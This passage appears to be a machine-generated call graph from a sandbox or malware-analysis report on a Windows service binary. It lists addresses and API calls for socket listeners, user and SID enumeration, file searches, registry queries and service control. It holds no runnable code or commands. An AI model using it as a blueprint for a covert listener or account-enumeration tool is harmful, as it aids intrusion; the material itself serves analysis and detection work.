7ff8ba4f1292 6 API calls 59000->59003 59001 7ff8ba4f4509 59007 7ff8ba4f1292 6 API calls 59001->59007 59002 7ff8ba4f43bd strlen 59002->58998 59005 7ff8ba4f4532 59003->59005 59004->58995 59004->58998 59004->59002 59004->59006 59008 7ff8ba4f443a CreateDirectoryA 59004->59008 59005->58948 59006->59000 59006->59001 59007->59005 59009 7ff8ba4f4451 GetLastError 59008->59009 59010 7ff8ba4f43e5 59008->59010 59009->59010 59010->59004 59011 7ff8ba4f1292 6 API calls 59010->59011 59011->59010 59013 7ff8ba4f4033 59012->59013 59030 7ff8ba4f4079 59012->59030 59015 7ff8ba4f40d2 59013->59015 59016 7ff8ba4f403c 59013->59016 59014 7ff8ba4f1292 6 API calls 59035 7ff8ba4f40c3 59014->59035 59019 7ff8ba4f1292 6 API calls 59015->59019 59017 7ff8ba4f4045 59016->59017 59018 7ff8ba4f410a 59016->59018 59020 7ff8ba4f4142 FindFirstFileA 59017->59020 59021 7ff8ba4f4051 FindNextFileA 59017->59021 59022 7ff8ba4f1292 6 API calls 59018->59022 59019->59035 59023 7ff8ba4f4156 59020->59023 59024 7ff8ba4f4163 GetLastError 59020->59024 59025 7ff8ba4f4067 59021->59025 59026 7ff8ba4f4192 GetLastError 59021->59026 59022->59035 59027 7ff8ba4f406c strcpy 59023->59027 59028 7ff8ba4f4177 59024->59028 59034 7ff8ba4f4170 59024->59034 59025->59027 59029 7ff8ba4f41bb 59026->59029 59026->59034 59027->59030 59031 7ff8ba4f1292 6 API calls 59028->59031 59033 7ff8ba4f1292 6 API calls 59029->59033 59030->59014 59030->59035 59031->59034 59032 7ff8ba4f41ad FindClose 59032->59030 59033->59034 59034->59030 59034->59032 59036 7ff8ba4f41d8 59034->59036 59035->58961 59036->58961 59037->58961 59038->58961 59039->58961 59040->58956 59041->58983 59042 7ff8bfb367c4 59045 7ff8bfb367d0 59042->59045 59043 7ff8bfb36869 EnterCriticalSection 59043->59045 59044 7ff8bfb368c1 EnterCriticalSection 59046 7ff8bfb368ce 59044->59046 59045->59043 59045->59044 59049 7ff8bfb367f6 LeaveCriticalSection 59045->59049 59056 7ff8bfb36848 GetProcessHeap HeapFree 59045->59056 59057 7ff8bfb3a202 59045->59057 59047 7ff8bfb368da WaitForSingleObject 59046->59047 59048 7ff8bfb36929 LeaveCriticalSection 59046->59048 59053 7ff8bfb36910 GetProcessHeap HeapFree 59046->59053 59069 7ff8bfb314c5 10 API calls 59047->59069 59049->59045 59051 7ff8bfb368b4 Sleep SleepEx 59049->59051 59051->59044 59053->59046 59054 7ff8bfb36823 WaitForSingleObject 59068 7ff8bfb314c5 10 API calls 59054->59068 59056->59045 59058 7ff8bfb3a210 59057->59058 59070 7ff8bfb3b210 59058->59070 59061 7ff8bfb3a2cc EnterCriticalSection 59064 7ff8bfb3a2e6 LeaveCriticalSection 59061->59064 59065 7ff8bfb3a303 59061->59065 59062 7ff8bfb3a297 fwrite fflush 59063 7ff8bfb3a2c0 59062->59063 59063->59054 59064->59062 59066 7ff8bfb3a33d CopyFileA 59065->59066 59067 7ff8bfb3a375 59066->59067 59067->59064 59068->59045 59069->59046 59071 7ff8bfb3b21e 59070->59071 59072 7ff8bfb3b235 59070->59072 59076 7ff8bfb3c24b fputc 59071->59076 59077 7ff8bfb3c24b fputc 59072->59077 59075 7ff8bfb3a269 59075->59061 59075->59062 59075->59063 59076->59075 59077->59075 59078 7ff8bfb3660a 59081 7ff8bfb3661c 59078->59081 59079 7ff8bfb367a6 59081->59079 59082 7ff8bfb3665d Sleep SleepEx 59081->59082 59083 7ff8bfb366ef GetProcessHeap HeapAlloc 59081->59083 59091 7ff8bfb31c0a 59081->59091 59082->59081 59084 7ff8bfb3667a 59083->59084 59085 7ff8bfb36716 memcpy 59083->59085 59084->59081 59086 7ff8bfb3a202 6 API calls 59084->59086 59089 7ff8bfb366ae LeaveCriticalSection 59084->59089 59090 7ff8bfb366c4 memcpy 59084->59090 59087 7ff8bfb3a202 6 API calls 59085->59087 59086->59084 59088 7ff8bfb36776 EnterCriticalSection 59087->59088 59088->59084 59089->59084 59090->59081 59092 7ff8bfb31c98 59091->59092 59093 7ff8bfb31c24 59091->59093 59094 7ff8bfb3a202 6 API calls 59092->59094 59093->59092 59095 7ff8bfb31c29 recv 59093->59095 59096 7ff8bfb31c43 59094->59096 59097 7ff8bfb31c3f 59095->59097 59098 7ff8bfb31c4c WSAGetLastError 59095->59098 59096->59081 59097->59096 59101 7ff8bfb3a202 6 API calls 59097->59101 59098->59096 59099 7ff8bfb31c60 59098->59099 59100 7ff8bfb3a202 6 API calls 59099->59100 59100->59096 59101->59096 59102 7ff8bfb363cb 59120 7ff8bfb363db 59102->59120 59103 7ff8bfb365ed 59104 7ff8bfb365f3 59103->59104 59182 7ff8bfb314c5 10 API calls 59103->59182 59108 7ff8bfb3640b Sleep 59108->59120 59109 7ff8bfb3a202 6 API calls 59109->59120 59112 7ff8bfb314c5 10 API calls 59112->59120 59114 7ff8bfb364b6 GetProcessHeap HeapAlloc 59115 7ff8bfb364dc CreateThread 59114->59115 59114->59120 59116 7ff8bfb3651f EnterCriticalSection 59115->59116 59117 7ff8bfb365a0 GetLastError 59115->59117 59119 7ff8bfb3653f LeaveCriticalSection 59116->59119 59118 7ff8bfb3a202 6 API calls 59117->59118 59118->59120 59122 7ff8bfb3a202 6 API calls 59119->59122 59120->59103 59120->59108 59120->59109 59120->59112 59120->59114 59123 7ff8bfb365d1 GetProcessHeap HeapFree 59120->59123 59124 7ff8bfb315fa socket 59120->59124 59142 7ff8bfb313f9 59120->59142 59148 7ff8bfb31344 setsockopt 59120->59148 59155 7ff8bfb319d9 59120->59155 59178 7ff8bfb3152a setsockopt 59120->59178 59122->59120 59123->59120 59125 7ff8bfb3162b 59124->59125 59126 7ff8bfb31702 WSAGetLastError 59124->59126 59128 7ff8bfb3152a 8 API calls 59125->59128 59127 7ff8bfb3a202 6 API calls 59126->59127 59129 7ff8bfb31726 59127->59129 59130 7ff8bfb31638 59128->59130 59131 7ff8bfb316f9 59129->59131 59135 7ff8bfb3a202 6 API calls 59129->59135 59132 7ff8bfb316f1 59130->59132 59133 7ff8bfb31641 htonl htons bind 59130->59133 59131->59120 59183 7ff8bfb314c5 10 API calls 59132->59183 59136 7ff8bfb31681 listen 59133->59136 59137 7ff8bfb316c4 WSAGetLastError 59133->59137 59135->59131 59136->59129 59139 7ff8bfb3169a WSAGetLastError 59136->59139 59138 7ff8bfb3a202 6 API calls 59137->59138 59140 7ff8bfb316c2 59138->59140 59141 7ff8bfb3a202 6 API calls 59139->59141 59140->59129 59140->59132 59141->59140 59143 7ff8bfb31409 ioctlsocket 59142->59143 59145 7ff8bfb3142c 59143->59145 59146 7ff8bfb3143d WSAGetLastError 59143->59146 59145->59120 59147 7ff8bfb3a202 6 API calls 59146->59147 59147->59145 59149 7ff8bfb31379 setsockopt 59148->59149 59150 7ff8bfb313d4 WSAGetLastError 59148->59150 59152 7ff8bfb313af WSAGetLastError 59149->59152 59153 7ff8bfb313a5 59149->59153 59151 7ff8bfb3a202 6 API calls 59150->59151 59151->59153 59154 7ff8bfb3a202 6 API calls 59152->59154 59153->59120 59154->59153 59156 7ff8bfb31a98 accept 59155->59156 59157 7ff8bfb31a04 59155->59157 59159 7ff8bfb31bda WSAGetLastError 59156->59159 59160 7ff8bfb31abe 59156->59160 59158 7ff8bfb313f9 8 API calls 59157->59158 59162 7ff8bfb31a0e 59158->59162 59163 7ff8bfb3a202 6 API calls 59159->59163 59161 7ff8bfb313f9 8 API calls 59160->59161 59164 7ff8bfb31acb 59161->59164 59165 7ff8bfb31a2e select 59162->59165 59175 7ff8bfb31a13 59162->59175 59163->59175 59166 7ff8bfb31bc6 59164->59166 59167 7ff8bfb31ad4 htonl htons 59164->59167 59168 7ff8bfb31b69 59165->59168 59169 7ff8bfb31a92 59165->59169 59184 7ff8bfb314c5 10 API calls 59166->59184 59170 7ff8bfb31af7 59167->59170 59173 7ff8bfb3a202 6 API calls 59168->59173 59169->59156 59172 7ff8bfb31b93 WSAGetLastError 59169->59172 59177 7ff8bfb3a202 6 API calls 59170->59177 59176 7ff8bfb3a202 6 API calls 59172->59176 59173->59175 59175->59120 59176->59175 59177->59175 59179 7ff8bfb31571 WSAGetLastError 59178->59179 59180 7ff8bfb31567 59178->59180 59181 7ff8bfb3a202 6 API calls 59179->59181 59180->59120 59181->59180 59182->59104 59183->59131 59184->59175 59185 7ff8b9153c88 59216 7ff8b91538c3 59185->59216 59186 7ff8b9153cd7 wcslen GetProcessHeap HeapAlloc 59186->59216 59187 7ff8b9153d97 NetApiBufferFree 59189 7ff8b9153d87 59187->59189 59188 7ff8b9153ed7 59194 7ff8b9151292 6 API calls 59188->59194 59210 7ff8b9153ee0 59188->59210 59189->59187 59189->59188 59191 7ff8b9153dba NetUserEnum 59189->59191 59199 7ff8b9153e36 GetProcessHeap HeapAlloc 59189->59199 59190 7ff8b9153d48 GetProcessHeap HeapAlloc 59192 7ff8b9153d6c 59190->59192 59190->59216 59191->59189 59196 7ff8b9151292 6 API calls 59192->59196 59192->59216 59193 7ff8b9154014 59231 7ff8b9151292 59193->59231 59194->59210 59195 7ff8b91538ee LocalAlloc 59195->59216 59196->59192 59202 7ff8b9153e70 59199->59202 59203 7ff8b91538a3 59199->59203 59200 7ff8b9153f0a 59207 7ff8b9153e7c memcpy GetProcessHeap HeapFree 59202->59207 59208 7ff8b9153eb5 59202->59208 59203->59189 59205 7ff8b9151292 6 API calls 59203->59205 59204 7ff8b915390d wcsncpy 59228 7ff8b915a05a 59204->59228 59205->59203 59206 7ff8b9151292 6 API calls 59206->59200 59207->59208 59210->59193 59211 7ff8b9153ee8 59210->59211 59242 7ff8b915379f 59211->59242 59213 7ff8b91539de GetLastError 59213->59216 59217 7ff8b9153a01 LocalAlloc 59213->59217 59214 7ff8b9153b84 ConvertSidToStringSidA 59214->59216 59218 7ff8b9153bd5 GetLastError 59214->59218 59215 7ff8b9153995 GetLastError 59219 7ff8b9151292 6 API calls 59215->59219 59216->59186 59216->59189 59216->59190 59216->59195 59216->59204 59216->59214 59216->59215 59225 7ff8b9151292 6 API calls 59216->59225 59220 7ff8b9153a1f LookupAccountNameW 59217->59220 59221 7ff8b9153b7a 59217->59221 59224 7ff8b9151292 6 API calls 59218->59224 59219->59216 59222 7ff8b9153a61 GetLastError 59220->59222 59223 7ff8b9153a53 LocalFree 59220->59223 59221->59214 59226 7ff8b9151292 6 API calls 59222->59226 59223->59216 59224->59216 59225->59216 59227 7ff8b9153a7f 59226->59227 59227->59223 59229 7ff8b915a082 wcslen 59228->59229 59230 7ff8b9153937 LookupAccountNameW 59228->59230 59229->59230 59230->59213 59230->59216 59232 7ff8b91512a0 59231->59232 59251 7ff8b915f010 59232->59251 59235 7ff8b915135c EnterCriticalSection 59237 7ff8b9151376 LeaveCriticalSection 59235->59237 59239 7ff8b9151393 59235->59239 59236 7ff8b9151327 fwrite fflush 59238 7ff8b9151350 59236->59238 59237->59236 59238->59200 59240 7ff8b91513cd CopyFileA 59239->59240 59241 7ff8b9151405 59240->59241 59241->59237 59243 7ff8b9153864 59242->59243 59244 7ff8b91537b2 59242->59244 59243->59200 59243->59206 59245 7ff8b9153841 59244->59245 59246 7ff8b91537e7 GetProcessHeap HeapFree 59244->59246 59248 7ff8b915380c GetProcessHeap HeapFree 59244->59248 59249 7ff8b9153831 LocalFree 59244->59249 59250 7ff8b9153839 LocalFree 59244->59250 59245->59243 59247 7ff8b915384d GetProcessHeap HeapFree 59245->59247 59246->59244 59247->59243 59248->59244 59249->59244 59250->59244 59252 7ff8b915f01e 59251->59252 59253 7ff8b915f035 59251->59253 59257 7ff8b916004b fputc 59252->59257 59258 7ff8b916004b fputc 59253->59258 59256 7ff8b91512f9 59256->59235 59256->59236 59256->59238 59257->59256 59258->59256 59259 7ff6be0312fd 59262 7ff6be031131 59259->59262 59263 7ff6be03115a 59262->59263 59264 7ff6be031172 59263->59264 59265 7ff6be031169 Sleep 59263->59265 59266 7ff6be031188 _amsg_exit 59264->59266 59267 7ff6be031194 59264->59267 59265->59263 59268 7ff6be0311b5 59266->59268 59267->59268 59269 7ff6be03119a _initterm 59267->59269 59270 7ff6be0311de 59268->59270 59271 7ff6be0311c5 _initterm 59268->59271 59269->59268 59283 7ff6be03a27a 59270->59283 59271->59270 59274 7ff6be03122e 59275 7ff6be031233 malloc 59274->59275 59276 7ff6be031253 59275->59276 59277 7ff6be031258 strlen malloc 59276->59277 59278 7ff6be031283 59276->59278 59277->59276 59296 7ff6be038e30 59278->59296 59280 7ff6be0312c4 59281 7ff6be0312e8 59280->59281 59282 7ff6be0312e3 _cexit 59280->59282 59282->59281 59284 7ff6be031208 SetUnhandledExceptionFilter 59283->59284 59286 7ff6be03a298 59283->59286 59284->59274 59285 7ff6be03a494 59285->59284 59288 7ff6be03a4bc VirtualProtect 59285->59288 59286->59285 59287 7ff6be03a315 59286->59287 59294 7ff6be03a34a 59286->59294 59287->59285 59289 7ff6be03a329 59287->59289 59288->59285 59289->59287 59300 7ff6be03a134 6 API calls 59289->59300 59294->59285 59295 7ff6be03a36d 59294->59295 59301 7ff6be03a134 6 API calls 59295->59301 59302 7ff6be03a0d0 VirtualQuery VirtualProtect GetLastError 59295->59302 59303 7ff6be03a0d0 VirtualQuery VirtualProtect GetLastError 59295->59303 59297 7ff6be038e40 59296->59297 59304 7ff6be038c4a 59297->59304 59300->59289 59301->59294 59302->59294 59303->59294 59305 7ff6be038c54 strcmp 59304->59305 59307 7ff6be038c6b strcmp 59305->59307 59308 7ff6be038cce 59305->59308 59309 7ff6be038e08 59307->59309 59310 7ff6be038c82 StartServiceCtrlDispatcherA 59307->59310 59325 7ff6be03849a 59308->59325 59312 7ff6be0399e2 6 API calls 59309->59312 59313 7ff6be038d26 GetLastError 59310->59313 59322 7ff6be038cbb 59310->59322 59312->59322 59391 7ff6be0399e2 59313->59391 59316 7ff6be038cd9 59344 7ff6be0388ee 10 API calls 59316->59344 59319 7ff6be038cde 59345 7ff6be0389aa 13 API calls 59319->59345 59321 7ff6be038cf7 _read 59321->59316 59323 7ff6be038ced 59321->59323 59322->59280 59323->59316 59323->59321 59382 7ff6be03886d 59323->59382 59402 7ff6be031360 GetModuleHandleExA 59325->59402 59330 7ff6be0384cc 59332 7ff6be0384d0 59330->59332 59464 7ff6be0393f0 59330->59464 59332->59316 59346 7ff6be038563 59332->59346 59339 7ff6be031360 8 API calls 59340 7ff6be038530 59339->59340 59341 7ff6be034bc4 12 API calls 59340->59341 59342 7ff6be038549 59341->59342 59342->59332 59516 7ff6be036242 59342->59516 59344->59319 59345->59322 59347 7ff6be031360 8 API calls 59346->59347 59348 7ff6be0385ae 59347->59348 59349 7ff6be034ab1 8 API calls 59348->59349 59350 7ff6be0385c3 59349->59350 59351 7ff6be0385cd strlen 59350->59351 59363 7ff6be0387cd 59350->59363 59353 7ff6be0385ea 59351->59353 59354 7ff6be038603 _mbscpy strlen strlen 59351->59354 59352 7ff6be038805 59352->59323 59353->59354 59355 7ff6be0385ef strlen 59353->59355 59365 7ff6be03864a 59354->59365 59355->59354 59356 7ff6be0387c3 59921 7ff6be031cd8 FindClose 59356->59921 59357 7ff6be031cf3 12 API calls 59357->59365 59359 7ff6be0387e4 59360 7ff6be0399e2 6 API calls 59359->59360 59360->59352 59361 7ff6be031694 8 API calls 59361->59365 59362 7ff6be0399e2 6 API calls 59362->59363 59363->59352 59363->59359 59363->59362 59833 7ff8b9188440 59363->59833 59850 7ff8ba4fa930 59363->59850 59863 7ff8bfb84510 59363->59863 59881 7ff8bfb3a6e0 59363->59881 59892 7ff8b915bdc0 59363->59892 59907 7ff8bfb534b0 59363->59907 59922 7ff6be0381e0 SetServiceStatus 59363->59922 59365->59356 59365->59357 59365->59361 59366 7ff6be038715 59365->59366 59368 7ff6be03866e FreeLibrary 59365->59368 59370 7ff6be031613 8 API calls 59365->59370 59920 7ff6be0381e0 SetServiceStatus 59365->59920 59367 7ff6be0399e2 6 API calls 59366->59367 59369 7ff6be03872d GetProcessHeap HeapAlloc 59367->59369 59368->59365 59372 7ff6be03874f _mbscpy 59369->59372 59373 7ff6be038776 59369->59373 59370->59365 59372->59373 59374 7ff6be03879b 59372->59374 59375 7ff6be0399e2 6 API calls 59373->59375 59374->59356 59374->59374 59375->59374 59383 7ff6be031360 8 API calls 59382->59383 59384 7ff6be03889c 59383->59384 59385 7ff6be034ab1 8 API calls 59384->59385 59386 7ff6be0388ae 59385->59386 59387 7ff6be0388b4 59386->59387 59388 7ff6be03824d 20 API calls 59386->59388 59387->59323 59389 7ff6be0388ca 59388->59389 59389->59387 59390 7ff6be0388d7 SleepEx 59389->59390 59390->59387 59392 7ff6be0399f0 59391->59392 61346 7ff6be03ab10 59392->61346 59395 7ff6be039a77 fwrite fflush 59397 7ff6be039aa0 59395->59397 59396 7ff6be039aac EnterCriticalSection 59398 7ff6be039ac6 LeaveCriticalSection 59396->59398 59399 7ff6be039ae3 59396->59399 59397->59322 59398->59395 59400 7ff6be039b1d CopyFileA 59399->59400 59401 7ff6be039b55 59400->59401 59401->59398 59403 7ff6be031388 59402->59403 59404 7ff6be031392 GetLastError 59402->59404 59406 7ff6be034bc4 59403->59406 59405 7ff6be0399e2 6 API calls 59404->59405 59405->59403 59407 7ff6be034c0a 59406->59407 59408 7ff6be034bda 59406->59408 59410 7ff6be0399e2 6 API calls 59407->59410 59538 7ff6be034ab1 59408->59538 59412 7ff6be034beb 59410->59412 59412->59330 59417 7ff6be033d81 59412->59417 59413 7ff6be034c3a strlen 59414 7ff6be034c4c 59413->59414 59415 7ff6be034c62 _mbscat strlen 59413->59415 59414->59415 59416 7ff6be034c51 strlen 59414->59416 59415->59412 59416->59415 59418 7ff6be033d98 59417->59418 59419 7ff6be033e84 59417->59419 59421 7ff6be033da1 CreateFileA 59418->59421 59422 7ff6be033eb4 59418->59422 59420 7ff6be0399e2 6 API calls 59419->59420 59423 7ff6be033e39 59420->59423 59425 7ff6be033ee7 GetLastError 59421->59425 59426 7ff6be033dec LockFileEx 59421->59426 59424 7ff6be0399e2 6 API calls 59422->59424 59433 7ff6be03414b 59423->59433 59434 7ff6be033e63 59423->59434 59424->59423 59427 7ff6be0399e2 6 API calls 59425->59427 59428 7ff6be033fcc GetLastError 59426->59428 59429 7ff6be033e20 59426->59429 59432 7ff6be033f08 59427->59432 59431 7ff6be0399e2 6 API calls 59428->59431 59429->59423 59430 7ff6be03413d CloseHandle 59429->59430 59430->59433 59437 7ff6be033fed 59431->59437 59432->59428 59435 7ff6be03403e 59432->59435 59438 7ff6be0399e2 6 API calls 59433->59438 59436 7ff6be0399e2 6 API calls 59434->59436 59435->59430 59435->59437 59439 7ff6be033e79 59436->59439 59437->59435 59438->59439 59439->59332 59440 7ff6be039b8c InitializeCriticalSectionAndSpinCount 59439->59440 59441 7ff6be039cdd GetLastError 59440->59441 59442 7ff6be039bba 59440->59442 59443 7ff6be0399e2 6 API calls 59441->59443 59444 7ff6be031360 8 API calls 59442->59444 59445 7ff6be039cb6 59443->59445 59446 7ff6be039bd6 59444->59446 59450 7ff6be0399e2 6 API calls 59445->59450 59447 7ff6be034ab1 8 API calls 59446->59447 59448 7ff6be039bea 59447->59448 59448->59445 59449 7ff6be039bf4 strlen 59448->59449 59451 7ff6be039c0d 59449->59451 59452 7ff6be039c23 59449->59452 59453 7ff6be039cd3 59450->59453 59451->59452 59454 7ff6be039c12 strlen 59451->59454 59455 7ff6be039c48 strlen fopen 59452->59455 59456 7ff6be039c28 _mbscat strlen 59452->59456 59453->59330 59454->59452 59457 7ff6be039daa 59455->59457 59458 7ff6be039c94 59455->59458 59456->59455 59459 7ff6be0399e2 6 API calls 59457->59459 59460 7ff6be0399e2 6 API calls 59458->59460 59459->59445 59461 7ff6be039cae 59460->59461 59461->59445 59462 7ff6be039e1a 59461->59462 59463 7ff6be0399e2 6 API calls 59462->59463 59463->59453 59552 7ff6be031694 59464->59552 59468 7ff6be039457 FreeLibrary 59471 7ff6be0394b7 GetNativeSystemInfo GetWindowsDirectoryA 59468->59471 59490 7ff6be03948d 59468->59490 59470 7ff6be0399e2 6 API calls 59493 7ff6be0384fe 59470->59493 59473 7ff6be0394f6 GetLastError 59471->59473 59474 7ff6be0395ce 59471->59474 59476 7ff6be0399e2 6 API calls 59473->59476 59477 7ff6be0399e2 6 API calls 59474->59477 59475 7ff6be0399e2 6 API calls 59475->59468 59476->59490 59478 7ff6be0395ef 59477->59478 59478->59490 59568 7ff6be035602 59478->59568 59480 7ff6be03963b GetVolumeInformationA 59481 7ff6be0399e2 6 API calls 59486 7ff6be03962b 59481->59486 59486->59480 59486->59481 59486->59490 59490->59470 59493->59332 59499 7ff6be03836f 59493->59499 59500 7ff6be031360 8 API calls 59499->59500 59501 7ff6be0383b4 59500->59501 59502 7ff6be034ab1 8 API calls 59501->59502 59503 7ff6be0383c6 59502->59503 59504 7ff6be0383f6 59503->59504 59505 7ff6be0383cc _mbscpy 59503->59505 59506 7ff6be0399e2 6 API calls 59504->59506 59595 7ff6be03824d strlen 59505->59595 59508 7ff6be038421 59506->59508 59508->59332 59508->59339 59510 7ff6be0383f2 59510->59504 59512 7ff6be038471 59510->59512 59517 7ff6be03626a 59516->59517 59518 7ff6be0362f5 59516->59518 59539 7ff6be034af8 59538->59539 59540 7ff6be034ac2 59538->59540 59541 7ff6be0399e2 6 API calls 59539->59541 59542 7ff6be034b28 59540->59542 59543 7ff6be034ac7 59540->59543 59549 7ff6be034add 59541->59549 59546 7ff6be0399e2 6 API calls 59542->59546 59544 7ff6be034b58 59543->59544 59545 7ff6be034ad0 59543->59545 59548 7ff6be0399e2 6 API calls 59544->59548 59551 7ff6be034972 8 API calls 59545->59551 59546->59549 59548->59549 59549->59412 59549->59413 59550 7ff6be034ad5 59550->59549 59551->59550 59553 7ff6be0316cb 59552->59553 59554 7ff6be0316a2 LoadLibraryA 59552->59554 59556 7ff6be0316ce GetLastError 59553->59556 59555 7ff6be0316b0 59554->59555 59554->59556 59557 7ff6be0399e2 6 API calls 59555->59557 59558 7ff6be0399e2 6 API calls 59556->59558 59559 7ff6be0316c9 59557->59559 59558->59559 59559->59490 59560 7ff6be031613 59559->59560 59561 7ff6be031630 GetProcAddress 59560->59561 59562 7ff6be031661 59560->59562 59563 7ff6be031666 GetLastError 59561->59563 59564 7ff6be031641 59561->59564 59562->59563 59566 7ff6be0399e2 6 API calls 59563->59566 59565 7ff6be0399e2 6 API calls 59564->59565 59567 7ff6be03165f 59565->59567 59566->59567 59567->59468 59567->59475 59569 7ff6be03568a 59568->59569 59570 7ff6be03562b 59568->59570 59573 7ff6be0399e2 6 API calls 59569->59573 59592 7ff6be0356e3 59569->59592 59571 7ff6be0356ed 59570->59571 59572 7ff6be035634 59570->59572 59574 7ff6be0399e2 6 API calls 59571->59574 59575 7ff6be03563d 59572->59575 59576 7ff6be035720 59572->59576 59573->59592 59574->59592 59578 7ff6be035646 RegOpenKeyExA 59575->59578 59579 7ff6be035753 59575->59579 59577 7ff6be0399e2 6 API calls 59576->59577 59577->59592 59580 7ff6be035786 RegQueryValueExA 59578->59580 59581 7ff6be03566d 59578->59581 59582 7ff6be0399e2 6 API calls 59579->59582 59593 7ff6be0357b4 59580->59593 59594 7ff6be035807 RegCloseKey 59580->59594 59585 7ff6be0399e2 6 API calls 59581->59585 59582->59592 59583 7ff6be0358e6 59589 7ff6be035aac 59583->59589 59590 7ff6be0399e2 6 API calls 59583->59590 59584 7ff6be035a89 59586 7ff6be0399e2 6 API calls 59584->59586 59585->59569 59588 7ff6be035929 59586->59588 59588->59486 59590->59588 59591 7ff6be0399e2 6 API calls 59591->59593 59592->59583 59592->59584 59593->59591 59593->59594 59594->59592 59596 7ff6be038267 59595->59596 59597 7ff6be03827d strlen 59595->59597 59596->59597 59599 7ff6be03826c strlen 59596->59599 59648 7ff6be0343a9 59597->59648 59599->59597 59600 7ff6be0382b6 59600->59510 59608 7ff6be0379c0 59600->59608 59602 7ff6be0382a5 59602->59600 59603 7ff6be038307 strlen 59602->59603 59604 7ff6be038348 59602->59604 59607 7ff6be038334 strlen 59602->59607 59654 7ff6be031cf3 59602->59654 59605 7ff6be0343a9 8 API calls 59603->59605 59678 7ff6be031cd8 FindClose 59604->59678 59605->59602 59607->59602 59609 7ff6be037a62 59608->59609 59610 7ff6be0379e2 59608->59610 59649 7ff6be0343c7 59648->59649 59650 7ff6be0343b2 GetFileAttributesA 59648->59650 59652 7ff6be0399e2 6 API calls 59649->59652 59651 7ff6be0343f7 GetLastError 59650->59651 59653 7ff6be0343bd 59650->59653 59651->59653 59652->59653 59653->59602 59655 7ff6be031d13 59654->59655 59672 7ff6be031d59 59654->59672 59657 7ff6be031d1c 59655->59657 59658 7ff6be031db2 59655->59658 59656 7ff6be0399e2 6 API calls 59677 7ff6be031da3 59656->59677 59672->59656 59672->59677 59677->59602 59678->59600 59923 7ff8b918143c InitializeCriticalSectionAndSpinCount 59833->59923 59836 7ff8b9188456 59838 7ff8b918845a 59836->59838 59992 7ff8b91849bf InitializeCriticalSectionAndSpinCount 59836->59992 59838->59363 60170 7ff8ba4f143c InitializeCriticalSectionAndSpinCount 59850->60170 59853 7ff8ba4fa946 59862 7ff8ba4fa94a 59853->59862 60239 7ff8ba4f2dde WSAStartup 59853->60239 59862->59363 60360 7ff8bfb8143c InitializeCriticalSectionAndSpinCount 59863->60360 59866 7ff8bfb84529 59867 7ff8bfb8452d 59866->59867 60427 7ff8bfb824ae WSAStartup 59866->60427 59870 7ff8bfb81292 19 API calls 59867->59870 59872 7ff8bfb8454a 59870->59872 59872->59363 59874 7ff8bfb8459b 59874->59867 60435 7ff8bfb89fe1 InitializeCriticalSectionAndSpinCount 59874->60435 60692 7ff8bfb3a3ac InitializeCriticalSectionAndSpinCount 59881->60692 59884 7ff8bfb3a6f6 59885 7ff8bfb3a6fa 59884->59885 60761 7ff8bfb31fce WSAStartup 59884->60761 59885->59363 59890 7ff8bfb3a741 59890->59885 60769 7ff8bfb36941 InitializeCriticalSectionAndSpinCount 59890->60769 60903 7ff8b915143c InitializeCriticalSectionAndSpinCount 59892->60903 59895 7ff8b915bdd6 59896 7ff8b915bdda 59895->59896 60972 7ff8b9152dde WSAStartup 59895->60972 59896->59363 61119 7ff8bfb5317c InitializeCriticalSectionAndSpinCount 59907->61119 59909 7ff8bfb534c6 59911 7ff8bfb534ca 59909->59911 61188 7ff8bfb52f1e WSAStartup 59909->61188 59911->59363 59916 7ff8bfb53511 59916->59911 61196 7ff8bfb53b21 InitializeCriticalSectionAndSpinCount 59916->61196 59920->59365 59921->59363 59922->59363 59924 7ff8b918146a 59923->59924 59925 7ff8b9181590 GetLastError 59923->59925 60048 7ff8b9181770 GetModuleHandleExA 59924->60048 59927 7ff8b9181292 6 API calls 59925->59927 59938 7ff8b9181569 59927->59938 59931 7ff8b91814a4 strlen 59933 7ff8b91814bd 59931->59933 59934 7ff8b91814d3 59931->59934 59932 7ff8b9181292 6 API calls 59946 7ff8b9181586 59932->59946 59933->59934 59935 7ff8b91814c2 strlen 59933->59935 59936 7ff8b91814f8 strlen fopen 59934->59936 59937 7ff8b91814d8 strcat strlen 59934->59937 59935->59934 59939 7ff8b918165d 59936->59939 59940 7ff8b9181547 59936->59940 59937->59936 59938->59932 59942 7ff8b9181292 6 API calls 59939->59942 60065 7ff8b9181292 59940->60065 59942->59938 59946->59836 59947 7ff8b9189004 59946->59947 59948 7ff8b9189026 59947->59948 59949 7ff8b9189069 59947->59949 60085 7ff8b9188c70 59948->60085 59951 7ff8b9181292 6 API calls 59949->59951 59954 7ff8b9188491 59951->59954 59953 7ff8b9189099 _errno _strtoui64 _errno 59953->59954 59955 7ff8b91890cc _errno 59953->59955 59954->59838 59957 7ff8b918e870 59954->59957 59956 7ff8b9181292 6 API calls 59955->59956 59956->59954 60127 7ff8b9181aa4 59957->60127 59993 7ff8b91849da OpenSCManagerA 59992->59993 59994 7ff8b9184a42 GetLastError 59992->59994 59996 7ff8b9184b1a GetLastError 59993->59996 59997 7ff8b9184a10 59993->59997 59995 7ff8b9181292 6 API calls 59994->59995 60003 7ff8b9184a1d 59995->60003 59999 7ff8b9181292 6 API calls 59996->59999 59998 7ff8b9184b36 59997->59998 59997->60003 60001 7ff8b9181292 6 API calls 59998->60001 59999->59998 60000 7ff8b9181292 6 API calls 60002 7ff8b9184a3a 60000->60002 60001->60002 60002->59838 60004 7ff8b918595e WSAStartup 60002->60004 60003->60000 60005 7ff8b918597a 60004->60005 60006 7ff8b91859a2 60004->60006 60008 7ff8b9181292 6 API calls 60005->60008 60007 7ff8b9181292 6 API calls 60006->60007 60049 7ff8b91817a2 GetLastError 60048->60049 60051 7ff8b9181486 60048->60051 60050 7ff8b9181292 6 API calls 60049->60050 60050->60051 60052 7ff8b918e0f1 60051->60052 60053 7ff8b918e102 60052->60053 60054 7ff8b918e138 60052->60054 60056 7ff8b918e107 60053->60056 60057 7ff8b918e168 60053->60057 60055 7ff8b9181292 6 API calls 60054->60055 60058 7ff8b918149a 60055->60058 60060 7ff8b918e110 60056->60060 60061 7ff8b918e198 60056->60061 60059 7ff8b9181292 6 API calls 60057->60059 60058->59931 60058->59938 60059->60058 60076 7ff8b918dfb2 8 API calls 60060->60076 60062 7ff8b9181292 6 API calls 60061->60062 60062->60058 60064 7ff8b918e115 60064->60058 60066 7ff8b91812a0 60065->60066 60077 7ff8b9190c10 60066->60077 60076->60064 60078 7ff8b9190c35 60077->60078 60079 7ff8b9190c1e 60077->60079 60086 7ff8b9188c81 60085->60086 60087 7ff8b9188cb9 60085->60087 60093 7ff8b9188959 60086->60093 60089 7ff8b9181292 6 API calls 